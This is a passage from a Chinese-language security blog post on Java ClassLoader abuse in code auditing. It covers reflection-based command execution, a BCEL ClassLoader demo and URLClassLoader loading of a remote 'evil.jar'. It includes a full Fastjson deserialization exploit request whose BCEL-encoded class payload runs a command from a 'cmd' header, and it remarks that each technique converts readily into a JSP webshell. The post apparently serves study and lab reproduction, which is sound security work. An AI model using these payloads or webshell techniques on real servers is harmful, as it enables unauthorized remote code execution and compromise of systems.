class="operator">=</span> testClass.getMethod(<span class="string">&quot;execute&quot;</span>, String.class);</span><br><span class="line"></span><br><span class="line">            <span class="comment">// 反射调用 execute 方法, 等价于 t.execute(cmd);</span></span><br><span class="line">            <span class="type">BufferedReader</span> <span class="variable">br</span> <span class="operator">=</span> (BufferedReader) method.invoke(runtimeInstance, <span class="string">&quot;whoami&quot;</span>);</span><br><span class="line"></span><br><span class="line">            <span class="comment">// 读取结果</span></span><br><span class="line">            String line=<span class="literal">null</span>;</span><br><span class="line">            <span class="keyword">while</span> ((line=br.readLine())!=<span class="literal">null</span>)&#123;</span><br><span class="line">                System.out.println(line);</span><br><span class="line">            &#125;</span><br><span class="line">            </span><br><span class="line">        &#125; <span class="keyword">catch</span> (Exception e) &#123;</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/img_convert/f7a818fca375e7c4bd0eccc4d09b0b58.png" alt="image-20220509160331973"></p>
<p>再然后就把这个重新封精简一些，写到jsp那不就是个webshell了吗</p>
<h1 id="0x03-BCEL"><a href="#0x03-BCEL" class="headerlink" title="0x03 BCEL"></a>0x03 BCEL</h1><h2 id="BCEL-ClassLoader"><a href="#BCEL-ClassLoader" class="headerlink" title="BCEL ClassLoader"></a>BCEL ClassLoader</h2><p><a target="_blank" rel="noopener" href="https://commons.apache.org/proper/commons-bcel/">BCEL</a>（<code>Apache Commons BCEL™</code>）是一个用于分析、创建和操纵Java类文件的工具库。</p>
<p>BCEL的类加载器在解析类名时，会对ClassName中有<code>$$BCEL$$</code>标识的类名做特殊处理，导致恶意加载类。</p>
<h3 id="BCEL攻击原理"><a href="#BCEL攻击原理" class="headerlink" title="BCEL攻击原理"></a>BCEL攻击原理</h3><p>当BCEL的加载一个类名中带有<code>$$BCEL$$</code>的类时，会截取出前面的<code>$$BCEL$$</code>后面的字符串，然后使用<code>com.sun.org.apache.bcel.internal.classfile.Utility#decode</code>这个方法把后面的将字符串解析成类字节码，所以我们可以把恶意类转化成这种形式，最后会调用<code>defineClass</code>加载恶意类，达到攻击效果</p>
<h2 id="BCEL版本"><a href="#BCEL版本" class="headerlink" title="BCEL版本"></a>BCEL版本</h2><p>Oracle JDK引用了BCEL库，不过修改了原包名</p>
<p><code>org.apache.bcel.util.ClassLoader</code>为<code>com.sun.org.apache.bcel.internal.util.ClassLoader</code></p>
<p>适用于BCEL 6.0以下</p>
<p>DK版本为：<code>JDK1.5 \- 1.7</code>、<code>JDK8 \- JDK8u241</code>、<code>JDK9</code>。</p>
<h2 id="利用示例"><a href="#利用示例" class="headerlink" title="利用示例"></a>利用示例</h2><p>写个命令执行的方法看看</p>
<p>利用BCELClassLoader加载恶意类，实现命令执行</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.bcel;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> org.apache.bcel.classfile.Utility;</span><br><span class="line"><span class="keyword">import</span> org.apache.bcel.util.ClassLoader;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">BCELClassLoader</span> &#123;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">bcel</span><span class="params">()</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line"></span><br><span class="line">        <span class="comment">// 创建BCEL类加载器</span></span><br><span class="line">        <span class="type">ClassLoader</span> <span class="variable">classLoader</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ClassLoader</span>();</span><br><span class="line"></span><br><span class="line">        <span class="comment">// BCEL编码类字节码</span></span><br><span class="line">        <span class="type">String</span> <span class="variable">className</span> <span class="operator">=</span> <span class="string">&quot;$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$85TmS$hU$Y$3d$97$bc$ec$b2$y$q$qB$J$f5$r$a8m$D$b4$89$d6jk$8a$a8$8dE$90$A5$a1P$daj$e7fs$L$5b7$bb$99$dd$8d$d2$9f$e2$_$e8$e7$fa$B$3av$c6$l$e0$3f$f2$83$8eg$93$94$UI$c7L$e6$d9$7d$ce$f3$7e$9e$bb$f7$cf$7f$7e$ff$D$c05$3c20$85$8fu$5c$d5$f1$89A$fdS$j$9f$Z$b8$8e$h$3a$3e$d7Q$d6q$d3$c0$S$be$88$c4$b2$81$_$f1$95$86$afGq$L$V$D$e3$f8F$c3m$Di$ach$f8$d6$40$G$ab$g$d64$7c$t$90$5c$b2$5d$3b$5c$W$88$V$e6w$E$e2$V$af$a9$ERU$dbU$9b$9dVC$f9$db$b2$e1$Q$c9T$3dK$3a$3b$d2$b7$p$bd$P$c6$c3$D$3b$88l$96$d7$w5$y$e5$94$w$5e$ab$r$dd$e6M$B$7d$c9r$fa$a9$b5$b6$efY$w$a0g$b6$faD$fe$yK$8et$f7Kwz$m$5dGlW$60$aag$b2$bd$d2$9a$db$ee$84$f5$d0W$b2E$e3$98$3dP$d9$a5$j$f8$C$e7$87$f9$d6$94l$w$3fJ$d7$a0$cb$cc$89$cb$ad$ce$e3$c7$caW$cd$T$bbP$a7$aam$dd$3e$b4T$3b$b4$3d$976$cd$ea$N$Q$N5h$95$Flw$9f$e6$a4$Xl$ca$W$e3$c7$eb$a1$b4$7e$da$90$ed$$$T$g$d6$c9$ab$80Q$f7$3a$be$a5V$ec$88$i$b3$cfE1$cacb$g$e7$E$a6$bd$b6r$f3Wd$be$o$j$ab$e3$c8$d0$f3$8b$b2$ddf$5d$_$u$ba$cc$ac$a1jb$D$9bDvm$b7$e9$fd$S0$b7$89$z$dc$n$db$5c$80$r$90$e0n$3a$87$Ci$ab$e3$3b$f9$a6$h8$de$7e1Z$80$86$efM$d4P7$b1$8d$bb$gvL$ec$e2$9e$40$ee$8d$5ci$d83q$l$P$a2$e6$k$b2$b9$e1$8cE$d6$l$b8$ba$n$84$99$f81$9a$w$fd$df$f5$T$g$90$b7$d5x$a2$ac$f0$U$d4$e3$f34$f44$I$V$X$3c$b6$afB$9e$8c$b6$f2$c3$a7$C$X$Lg$b70$3fl1F$QJ$3f$Mv$ed$f0$80$cb$j$Wu_$60r$80$d6$3anhG$8b4X$efD$99$w$bc$9e$bc$P3$7b$5c$j$w2$7f$e9$7f$ba$Z$9c$e8$c93$a0$c0$E$x$ad$bd$7e$96$cf$bd$aav$e6$cc$cfua$97$b8u$m$fd$40$85$acFZ$a5$df$ac$f4t$a6K$dc$dd$5eytC$60$b6z$c6$b9$ef$c4DW$LC$x$bc9$q$ba$D$b2$83$a0$fe7$T$a1$a96$e7$N$bb$c7$7e$db$97$96$c2$i$de$e2$85$U$fdF$m$a2$e3M9C$ad$c4$a7$e03$b1p$M$f1$bck$ceQ$s$bb$e0$uf$v$cd$9e$D$ce$e3m$3eu$bc$f3$wX$5c$40$i$g$b1$87$99$91$f5L$ec$F$e2$d5$c5L$e2$I$c9_1$9a$d1$d6$9fae1$a3$f7$d5Q$aa$d7_$c0X8$c2$d8$c6$e5$p$98$9b$91$u$c7_b$7c$_$X$ff$N$T$c7H$95$T$_$91$de$cb$r$8e1YN$3e$83$k$f9e$9f$b3$d6$r$d4$b1$c3$7b0$d6$edm$Z$v$ca1j$e3$ec0E$3c$cdn2$i1K$cfi$8e4$c3$Lw$We$f6$bb$8aw$Z$fb$3e$a3$f3$fc$be$e6$f0$A$X$bb3$d58G$J$l$d2$fa$k$t$beF$99$a75$c6$98$i$bd$e78$d7$w$x$7c$40$8f$E$e3$81$L$8cK2C$9c$V$K$8c$88$e1$k$e6$b1$d0$e5$a8$86E$be$J$5c$a6$96E$fco$cch$b8$c2$ff$84$ab$a1$f8$XC$EKE$c4$7e$f4$_$af$pH$dd$k$G$A$A&quot;</span>;</span><br><span class="line">        Class&lt;?&gt; clazz = Class.forName(className, <span class="literal">true</span>, classLoader);</span><br><span class="line"></span><br><span class="line">        System.out.println(clazz);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        bcel();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>成功执行</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/20cb6ff2dec7b695362e8c83dd6bd1ce.png" alt="image-20220509170903092"></p>
<p>同理，改成jsp格式的，也是一个webshell。</p>
<h1 id="0x04-BCEL-Fastjson-应用"><a href="#0x04-BCEL-Fastjson-应用" class="headerlink" title="0x04 BCEL Fastjson 应用"></a>0x04 BCEL Fastjson 应用</h1><p>在fastjson中主要是通过 <code>org.apache.commons.dbcp.BasicDataSource</code>类来出发BECL的类加载器</p>
<p>首先发送payload：</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/092dc44a375fae97c3e4dc6f225f8cda.png" alt="image-20220509191509212"></p>
<p>1、FastJson自动调用setter方法修改<code>org.apache.commons.dbcp.BasicDataSource</code>类的<code>driverClassName</code>和<code>driverClassLoader</code>值</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">其中</span><br><span class="line">driverClassName 是经过BCEL编码后的类字节码 </span><br><span class="line">driverClassLoader 是一个由FastJson创建的org.apache.bcel.util.ClassLoader 实例。</span><br></pre></td></tr></table></figure>

<p>在自动setter之后，并没有触发漏洞，只是注入了类名和类加载器。</p>
<p>导致命令执行就在于FastJson会自动调用getter方法的<code>getConnection()</code>方法</p>
<p><code>org.apache.commons.dbcp.BasicDataSource</code>本没有<code>connection</code>成员变量，但有一个<code>getConnection()</code>方法</p>
<p>当<code>getConnection()</code>方法被调用时就会使用注入进来的<code>org.apache.bcel.util.ClassLoader</code>类加载器加载注入进来恶意类字节码</p>
<p>命令执行带回显</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">POST / HTTP/1.1</span><br><span class="line">Host: 127.0.0.1:8080</span><br><span class="line">User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:99.0) Gecko/20100101 Firefox/99.0</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Connection: close</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">Content-Type: application/json</span><br><span class="line">cmd: whoami</span><br><span class="line">Content-Length: 3651</span><br><span class="line"></span><br><span class="line">&#123;</span><br><span class="line">    &quot;xx&quot;:</span><br><span class="line">    &#123;</span><br><span class="line">        &quot;@type&quot; : &quot;java.lang.Class&quot;,</span><br><span class="line">        &quot;val&quot;   : &quot;org.apache.tomcat.dbcp.dbcp2.BasicDataSource&quot;</span><br><span class="line">    &#125;,</span><br><span class="line">    &quot;x&quot; : &#123;</span><br><span class="line">        &quot;name&quot;: &#123;</span><br><span class="line">            &quot;@type&quot; : &quot;java.lang.Class&quot;,</span><br><span class="line">            &quot;val&quot;   : &quot;com.sun.org.apache.bcel.internal.util.ClassLoader&quot;</span><br><span class="line">        &#125;,</span><br><span class="line">        &#123;</span><br><span class="line">            &quot;@type&quot;:&quot;com.alibaba.fastjson.JSONObject&quot;,</span><br><span class="line">            &quot;c&quot;: &#123;</span><br><span class="line">                &quot;@type&quot;:&quot;org.apache.tomcat.dbcp.dbcp2.BasicDataSource&quot;,</span><br><span class="line">                &quot;driverClassLoader&quot;: &#123;</span><br><span class="line">                    &quot;@type&quot; : &quot;com.sun.org.apache.bcel.internal.util.ClassLoader&quot;</span><br><span class="line">                &#125;,</span><br><span class="line">                &quot;driverClassName&quot;:&quot;$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dV$cb$5b$TW$U$ff$5dH27$c3$m$g$40$Z$d1$wX5$a0$q$7d$d8V$81Zi$c4b$F$b4F$a5$f8j$t$c3$85$MLf$e2$cc$E$b1$ef$f7$c3$be$ec$a6$df$d7u$X$ae$ddD$bf$f6$d3$af$eb$$$ba$ea$b6$ab$ae$ba$ea$7fP$7bnf$C$89$d0$afeq$ee$bd$e7$fe$ce$ebw$ce$9d$f0$cb$df$3f$3e$Ap$I$df$aaHbX$c5$IF$a5x$9e$e3$a8$8a$Xp$8ccL$c1$8b$w$U$e4$U$iW1$8e$T$i$_qLp$9c$e4x$99$e3$94$bc$9b$e4$98$e2$98VpZ$o$cep$bc$c2qVE$k$e7Tt$e2$3c$c7$F$b9$cep$bc$ca1$cbqQ$G$bb$c4qY$c1$V$VW$f1$9a$U$af$ab0PP$b1$h$s$c7$9c$5c$85$U$f3$i$L$iE$F$96$82E$86$c4$a8$e5X$c1Q$86$d6$f4$c0$F$86X$ce$9d$T$M$j$93$96$p$a6$x$a5$82$f0$ce$Z$F$9b4$7c$d4$b4$pd$7b$3e0$cc$a5$v$a3$5c$bb$a2j$U$yQ$z$94$ac$C$9b$fc2$a8y$b7$e2$99$e2$84$r$z$3b$f2e$cfr$W$c6$cd$a2$9bY4$96$N$N$H1$a4$a0$a4$c1$81$ab$a1$8ck$M$a3$ae$b7$90$f1k$b8y$cf$u$89$eb$ae$b7$94$b9$$$K$Z$d3u$C$b1$Sd$3cq$ad$o$fc$ms6$5cs$a1z$c2$b5$e7$84$a7$c0$d3$e0$p$60$e8Z$QA$84$Y$L$C$cf$wT$C$e1S$G2l$d66$9c$85l$ce6$7c_C$F$cb$M$9b$d7$d4$a7$L$8b$c2$M$a8$O$N$d7$b1$c2p$ec$ff$e6$93$X$de$b2$bda$d0$b6Z$$$7e$d9u$7c$oA$5d$cb$8ca$a7$M$bc$92$f1C$db5$lup$92$c03$9e$V$I$aa$eb$86$ccto$b3A1$I$ca$99$J$S$cd$d1C$c3$Ja$Q$tM$d5$e5$DY$88$867$f0$s$f5$d9$y$cd1$u$ae$9fq$a80$Foix$h$efhx$X$ef$d1$e5$cc$c9i$N$ef$e3$D$86$96$acI$b0l$c1r$b2$7e$91$8eC$a6$86$P$f1$R$e9$q$z$81$ed0l$a9$85$a8$E$96$9d$cd$9b$86$e3$c8V$7c$ac$e1$T$7c$aa$e13$7c$ae$e0$a6$86$_$f0$a5l$f8W$e4$e1$f2$98$86$af$f1$8d$86$5b2T$7c$de$aeH$c7q$d3ve$d1$9dk$f9$8e$af$98$a2$iX$$$85$e85$ddRv$de$f0$83E$dfu$b2$cb$V$8a$b4$3aM$M$3dk6$9e$98$b7$a9$85$d9$v$R$U$5d$w$b0$f3$d2$e4$a3$E$8c4$91r$ae$e8$RS4$cdf$c5$f3$84$T$d4$cf$5d$e9$81$c9GQd$d9M$d4FSW$9b$a1I7$a4Yo$827$5cI$9b$N$_$a8M6mj$gjmz$7d$9e$eb$3c$8e$84$ad$ad$d7vl$D$9bK$ebl$g$bd4$b3C$ee$S$96$b3$ec$$$R$edG$g$7d$85$cf$a0$c9W$a4$gX$af$a2$feSN$c7$85i$h$9e$98$ab$e7$d6$ee$8b$60$cc4$85$ef$5b$b5$efF$y$7dQ$7eW$g$a7$f1$86$l$88R$f8$40$cexnYx$c1$N$86$7d$ff$c1$c3j$L$db$C$f7$7c$99$8cr$86$9c$9a$e6n$ad$82$b8$7c$a7$86$e5$Q$c1$bd$8d$8esE$c3$cb$cb$d7$e2$98bd$e0$o$Be$5b$c3Nt$ae$ef$e4H$7d$c6k$aa$b3$V$t$b0J$f5$c7$5c$3ft7$99Ej2$8c$89$VA$_$u$9d$de$60$Q$h$z$88$C$c9Vs$a8H$c9$b0$89B$9dt$ca$95$80$y$85A$acm$ab$87$b3$dcl$c3$F$99$f7$a47$bc$90$eck$V_$i$X$b6U$92$df$U$86$fd$ff$ceu$e3c$96E84$ef$e8$c3$B$fa$7d$91$7f$z$60$f2$ebM2C$a7$9d$b42Z$e3$83w$c1$ee$d0$86$nK2QS$s$c0$f1D$j$da$d2O$O$da$Ip$f5$kZ$aahM$c5$aa$88$9f$gL$rZ$efC$a9$82O$k$60$b4KV$a1NE$80$b6$Q$a0$d5$B$83$a9$f6h$3b$7d$e0$60$84$j$8e$N$adn$e3$91$dd$s$b2Ku$84$d0$cd$c3$89H$bbEjS1$d2$ce$b6$a6$3a$f3$f2J$d1$VJ$a2KO$84R$8f$d5$3dq$5d$d1$e3$EM$S$b4$9b$a0$ea$cf$e8$iN$s$ee$93TS$5b$efa$5b$V$3d$v$bd$8a$ed$df$p$a5$ab$S$a3$ab$b1To$fe6$3a$e4qG$ed$b8$93d$5cO$e6u$5e$c5c$a9$5d$8d$91u$k$3a$ff$J$bbg$ef$a1OW$ab$e8$afb$cf$5d$3c$9e$da$5b$c5$be$w$f6$cb$a03$a1e$3a$aaD$e7Qz$91$7e$60$9d$fe6b$a7$eeH$e6$d9$y$bb$8cAj$95$ec$85$83$5e$92IhP$b1$8d$3a$d0G$bb$n$b4$e306$n$87$OLc3f$b1$F$$R$b8I$ffR$dcB$X$beC7$7e$c0VP$a9x$80$k$fc$K$j$bfa$3b$7e$c7$O$fcAM$ff$T$bb$f0$Xv$b3$B$f4$b11$f4$b3Y$ec$a5$88$7b$d8$V$ec$c7$93$U$edY$c4$k$S$b8M$c1S$K$9eVp$a8$$$c3M$b8$7fF$n$i$da$k$c2$93s$a3$e099$3d$87k$pv$e4$l$3eQL$40E$J$A$A&quot;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125; : &quot;xxx&quot;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/img_convert/3040b575c96d8e1b202298e2b9ac73bf.png" alt="image-20220509173521483"></p>
<p>还有就是，在Oracle JDK默认也引用了Xalan利用TemplatesImpl这个也行，但是这个要求更多，原理类似但是需要开启<code>SupportNonPublicField</code>特性，比较麻烦就不写了。</p>
<h1 id="0x05-URLclassloader"><a href="#0x05-URLclassloader" class="headerlink" title="0x05 URLclassloader"></a>0x05 URLclassloader</h1><h2 id="URLClassLoader"><a href="#URLClassLoader" class="headerlink" title="URLClassLoader"></a>URLClassLoader</h2><p><code>URLClassLoader</code>继承了<code>ClassLoader</code>的一个子类</p>
<p><code>URLClassLoader</code>一看名字就是知道可以远程加载，在漏洞利用的时候可以加载远程的jar来实现远程的类方法调用。</p>
<h2 id="利用示例："><a href="#利用示例：" class="headerlink" title="利用示例："></a>利用示例：</h2><p>编译打包jar：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">javac Evil.java</span><br><span class="line">jar -cvf evil.jar Evil.class</span><br></pre></td></tr></table></figure>

<p>恶意类：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//注意这里可以不使用包名</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.io.BufferedReader;</span><br><span class="line"><span class="keyword">import</span> java.io.IOException;</span><br><span class="line"><span class="keyword">import</span> java.io.InputStreamReader;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Evil</span> &#123;</span><br><span class="line">    String res;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="title function_">Evil</span><span class="params">()</span> &#123;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> String <span class="title function_">exec</span><span class="params">(String var0)</span> <span class="keyword">throws</span> IOException &#123;</span><br><span class="line">        <span class="type">StringBuilder</span> <span class="variable">var1</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">StringBuilder</span>();</span><br><span class="line">        <span class="type">BufferedReader</span> <span class="variable">var2</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">BufferedReader</span>(<span class="keyword">new</span> <span class="title class_">InputStreamReader</span>(Runtime.getRuntime().exec(var0).getInputStream()));</span><br><span class="line"></span><br><span class="line">        String var3;</span><br><span class="line">        <span class="keyword">while</span>((var3 = var2.readLine()) != <span class="literal">null</span>) &#123;</span><br><span class="line">            var1.append(var3).append(<span class="string">&quot;\n&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> var1.toString();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> String <span class="title function_">toString</span><span class="params">()</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="built_in">this</span>.res;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>起一个http服务，把jar放上去，保证可以远程请求到</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.urlclassloader;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.io.ByteArrayOutputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.InputStream;</span><br><span class="line"><span class="keyword">import</span> java.net.URL;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">URLClassLoader</span> &#123;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> &#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            <span class="comment">// 定义远程加载的jar路径</span></span><br><span class="line">            <span class="type">URL</span> <span class="variable">url</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">URL</span>(<span class="string">&quot;http://127.0.0.1/evil.jar&quot;</span>);</span><br><span class="line"></span><br><span class="line">            <span class="comment">// 创建URLClassLoader对象，并加载远程jar包</span></span><br><span class="line">            java.net.<span class="type">URLClassLoader</span> <span class="variable">ucl</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">java</span>.net.URLClassLoader(<span class="keyword">new</span> <span class="title class_">URL</span>[]&#123;url&#125;);</span><br><span class="line"></span><br><span class="line">            <span class="comment">// 定义需要执行的系统命令</span></span><br><span class="line">            <span class="type">String</span> <span class="variable">cmd</span> <span class="operator">=</span> <span class="string">&quot;whoami&quot;</span>;</span><br><span class="line"></span><br><span class="line">            <span class="comment">// 通过URLClassLoader加载远程jar包中的Evil类</span></span><br><span class="line">            <span class="type">Class</span> <span class="variable">cmdClass</span> <span class="operator">=</span> ucl.loadClass(<span class="string">&quot;Evil&quot;</span>);</span><br><span class="line"></span><br><span class="line">            <span class="comment">// 调用Evil类中的exec方法</span></span><br><span class="line">            <span class="type">String</span> <span class="variable">out</span> <span class="operator">=</span> (String) cmdClass.getMethod(<span class="string">&quot;exec&quot;</span>, String.class).invoke(<span class="literal">null</span>, cmd);</span><br><span class="line"></span><br><span class="line">            <span class="comment">// 输出命令执行结果</span></span><br><span class="line">            System.out.println(out);</span><br><span class="line"></span><br><span class="line">        &#125; <span class="keyword">catch</span> (Exception e) &#123;</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>成功执行<img src="https://img-blog.csdnimg.cn/img_convert/1559910082da491326ca85a0f437b63a.png"></p>
<h1 id="0x06-实验环境"><a href="#0x06-实验环境" class="headerlink" title="0x06 实验环境"></a>0x06 实验环境</h1><p>可以直接参考这个，是我实验环境</p>
<p>[JavaStudyEnv&#x2F;classloader at master · godzeo&#x2F;JavaStudyEnv (github.com)](</p>
</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="https://godzeo.github.io">Zeo</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://godzeo.github.io/2022/05/10/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%EF%BC%9A%20ClassLoader%E5%BA%94%E7%94%A8/">https://godzeo.github.io/2022/05/10/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%EF%BC%9A%20ClassLoader%E5%BA%94%E7%94%A8/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://godzeo.github.io" target="_blank">Zeo's Security Lab</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/%E5%AE%89%E5%85%A8%E5%BC%80%E5%8F%91-WEB-%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%92%8C%E5%88%86%E6%9E%90-java-%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/">安全开发 WEB 漏洞复现和分析 java 开发语言</a></div><div class="post_share"><div class="social-share" data-image="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231225566.webp" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2022/10/30/Go%20%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E9%AB%98%E5%8D%B1%E6%BC%8F%E6%B4%9E(sqli!cmd!ssrf)/"><img class="prev-cover" src="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231225566.webp" onerror="onerror=null;src='/img/404.jpg'" alt="cover of previous post"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">Go 代码审计高危漏洞(sqli\cmd\ssrf)</div></div></a></div><div class="next-post pull-right"><a href="/2022/04/22/CodeQL%E5%9F%BA%E7%A1%80%E8%AF%AD%E6%B3%95/"><img class="next-cover" src="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231225569.webp" onerror="onerror=null;src='/img/404.jpg'" alt="cover of next post"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">CodeQL基础语法</div></div></a></div></nav></div><div class="aside-content" id="aside-content"><div class="card-widget card-info"><div class="is-center"><div class="avatar-img"><img src="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231013354.png" onerror="this.onerror=null;this.src='/img/friend_404.gif'" 